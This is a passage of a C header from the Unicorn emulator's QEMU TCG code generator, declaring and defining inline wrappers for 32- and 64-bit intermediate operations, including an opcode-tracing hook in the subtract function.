tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), a3); } static inline void tcg_gen_op3i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGArg a3) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), a3); } static inline void tcg_gen_ldst_op_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 val, TCGv_ptr base, TCGArg offset) { tcg_gen_op3(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, val), tcgv_ptr_arg(tcg_ctx, base), offset); } static inline void tcg_gen_ldst_op_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 val, TCGv_ptr base, TCGArg offset) { tcg_gen_op3(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, val), tcgv_ptr_arg(tcg_ctx, base), offset); } static inline void tcg_gen_op4_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4)); } static inline void tcg_gen_op4_i64(TCGContext *tcg_ctx, TCGOpcode opc, 
TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4)); } static inline void tcg_gen_op4i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), a4); } static inline void tcg_gen_op4i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), a4); } static inline void tcg_gen_op4ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGArg a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), a3, a4); } static inline void tcg_gen_op4ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGArg a3, TCGArg a4) { tcg_gen_op4(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), a3, a4); } static inline void tcg_gen_op5_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGv_i32 a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5)); } static inline void tcg_gen_op5_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5)); } static inline void tcg_gen_op5i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), a5); } static inline void tcg_gen_op5i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), a5); } static inline void tcg_gen_op5ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGArg a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), a4, a5); } static inline void tcg_gen_op5ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGArg a4, TCGArg a5) { tcg_gen_op5(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), a4, a5); } static inline void tcg_gen_op6_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGv_i32 a5, TCGv_i32 a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5), tcgv_i32_arg(tcg_ctx, a6)); } static inline void tcg_gen_op6_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5, TCGv_i64 a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5), tcgv_i64_arg(tcg_ctx, a6)); } static inline void tcg_gen_op6i_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 
a3, TCGv_i32 a4, TCGv_i32 a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), tcgv_i32_arg(tcg_ctx, a5), a6); } static inline void tcg_gen_op6i_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGv_i64 a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), tcgv_i64_arg(tcg_ctx, a5), a6); } static inline void tcg_gen_op6ii_i32(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i32 a1, TCGv_i32 a2, TCGv_i32 a3, TCGv_i32 a4, TCGArg a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i32_arg(tcg_ctx, a1), tcgv_i32_arg(tcg_ctx, a2), tcgv_i32_arg(tcg_ctx, a3), tcgv_i32_arg(tcg_ctx, a4), a5, a6); } static inline void tcg_gen_op6ii_i64(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_i64 a1, TCGv_i64 a2, TCGv_i64 a3, TCGv_i64 a4, TCGArg a5, TCGArg a6) { tcg_gen_op6(tcg_ctx, opc, tcgv_i64_arg(tcg_ctx, a1), tcgv_i64_arg(tcg_ctx, a2), tcgv_i64_arg(tcg_ctx, a3), tcgv_i64_arg(tcg_ctx, a4), a5, a6); } /* Generic ops. */ static inline void gen_set_label(TCGContext *tcg_ctx, TCGLabel *l) { l->present = 1; tcg_gen_op1(tcg_ctx, INDEX_op_set_label, label_arg(l)); } static inline void tcg_gen_br(TCGContext *tcg_ctx, TCGLabel *l) { l->refs++; tcg_gen_op1(tcg_ctx, INDEX_op_br, label_arg(l)); } void tcg_gen_mb(TCGContext *tcg_ctx, TCGBar); /* Helper calls. */ /* 32 bit ops */ void tcg_gen_addi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_subfi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2); void tcg_gen_subi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_andi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_ori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_xori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_shli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_shri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_sari_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_muli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_div_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rem_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_divu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_remu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_andc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_eqv_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_nand_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_nor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_orc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_clzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2); void tcg_gen_ctzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2); void tcg_gen_clrsb_i32(TCGContext *tcg_ctx, TCGv_i32 ret, 
TCGv_i32 arg); void tcg_gen_ctpop_i32(TCGContext *tcg_ctx, TCGv_i32 a1, TCGv_i32 a2); void tcg_gen_rotl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rotli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2); void tcg_gen_rotr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_rotri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2); void tcg_gen_deposit_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2, unsigned int ofs, unsigned int len); void tcg_gen_deposit_z_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_sextract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract2_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 al, TCGv_i32 ah, unsigned int ofs); void tcg_gen_brcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, TCGv_i32 arg2, TCGLabel *); void tcg_gen_brcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, int32_t arg2, TCGLabel *); void tcg_gen_setcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_setcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2); void tcg_gen_movcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 c1, TCGv_i32 c2, TCGv_i32 v1, TCGv_i32 v2); void tcg_gen_add2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh); void tcg_gen_sub2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh); void tcg_gen_mulu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_muls2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_mulsu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_ext8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_ext16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_bswap16_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_bswap32_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg); void tcg_gen_smin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_smax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_umin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_umax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32 arg1, TCGv_i32 arg2); void tcg_gen_abs_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv_i32); static inline void tcg_gen_discard_i32(TCGContext *tcg_ctx, TCGv_i32 arg) { tcg_gen_op1_i32(tcg_ctx, INDEX_op_discard, arg); } static inline void tcg_gen_mov_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (ret != arg) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_mov_i32, ret, arg); } } static inline void tcg_gen_movi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg) { tcg_gen_op2i_i32(tcg_ctx, INDEX_op_movi_i32, ret, arg); } static inline void tcg_gen_ld8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld8u_i32, ret, arg2, offset); 
} static inline void tcg_gen_ld8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld8s_i32, ret, arg2, offset); } static inline void tcg_gen_ld16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld16u_i32, ret, arg2, offset); } static inline void tcg_gen_ld16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld16s_i32, ret, arg2, offset); } static inline void tcg_gen_ld_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_ld_i32, ret, arg2, offset); } static inline void tcg_gen_st8_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st8_i32, arg1, arg2, offset); } static inline void tcg_gen_st16_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st16_i32, arg1, arg2, offset); } static inline void tcg_gen_st_i32(TCGContext *tcg_ctx, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i32(tcg_ctx, INDEX_op_st_i32, arg1, arg2, offset); } static inline void tcg_gen_add_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_add_i32, ret, arg1, arg2); } static inline void tcg_gen_sub_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { uc_engine *uc = tcg_ctx->uc; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { gen_uc_traceopcode(tcg_ctx, hook, (TCGv_i64)arg1, (TCGv_i64)arg2, 32, uc, tcg_ctx->pc_start); } } } tcg_gen_op3_i32(tcg_ctx, INDEX_op_sub_i32, ret, arg1, arg2); } static inline void tcg_gen_and_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_and_i32, ret, arg1, arg2); } static inline void tcg_gen_or_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_or_i32, ret, arg1, arg2); } static inline void tcg_gen_xor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_xor_i32, ret, arg1, arg2); } static inline void tcg_gen_shl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_shl_i32, ret, arg1, arg2); } static inline void tcg_gen_shr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_shr_i32, ret, arg1, arg2); } static inline void tcg_gen_sar_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_sar_i32, ret, arg1, arg2); } static inline void tcg_gen_mul_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, ret, arg1, arg2); } static inline void tcg_gen_neg_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_neg_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_neg_i32, ret, arg); } else { tcg_gen_subfi_i32(tcg_ctx, ret, 0, arg); } } static inline void tcg_gen_not_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_not_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_not_i32, ret, arg); } else { 
tcg_gen_xori_i32(tcg_ctx, ret, arg, -1); } } /* 64 bit ops */ void tcg_gen_addi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_subfi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg1, TCGv_i64 arg2); void tcg_gen_subi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_andi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_ori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_xori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_shli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_shri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_sari_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_muli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void tcg_gen_div_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rem_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_divu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_remu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_andc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_eqv_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_nand_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_nor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_orc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_clzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2); void tcg_gen_ctzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2); void tcg_gen_clrsb_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ctpop_i64(TCGContext *tcg_ctx, TCGv_i64 a1, TCGv_i64 a2); void tcg_gen_rotl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rotli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2); void tcg_gen_rotr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_rotri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2); void tcg_gen_deposit_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2, unsigned int ofs, unsigned int len); void tcg_gen_deposit_z_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_sextract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len); void tcg_gen_extract2_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 al, TCGv_i64 ah, unsigned int ofs); void tcg_gen_brcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2, TCGLabel *); void tcg_gen_brcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, int64_t arg2, TCGLabel *); void tcg_gen_setcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_setcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2); void 
tcg_gen_movcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 c1, TCGv_i64 c2, TCGv_i64 v1, TCGv_i64 v2); void tcg_gen_add2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); void tcg_gen_sub2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); void tcg_gen_mulu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_muls2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_mulsu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_not_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_ext32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap16_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_bswap64_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_smin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_smax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_umin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_umax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_abs_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv_i64); #if TCG_TARGET_REG_BITS == 64 static inline void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_gen_op1_i64(tcg_ctx, INDEX_op_discard, arg); } static inline void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { if (ret != arg) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_mov_i64, ret, arg); } } static inline void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg) { tcg_gen_op2i_i64(tcg_ctx, INDEX_op_movi_i64, ret, arg); } static inline void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld8u_i64, ret, arg2, offset); } static inline void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld8s_i64, ret, arg2, offset); } static inline void tcg_gen_ld16u_i64(TCGContext 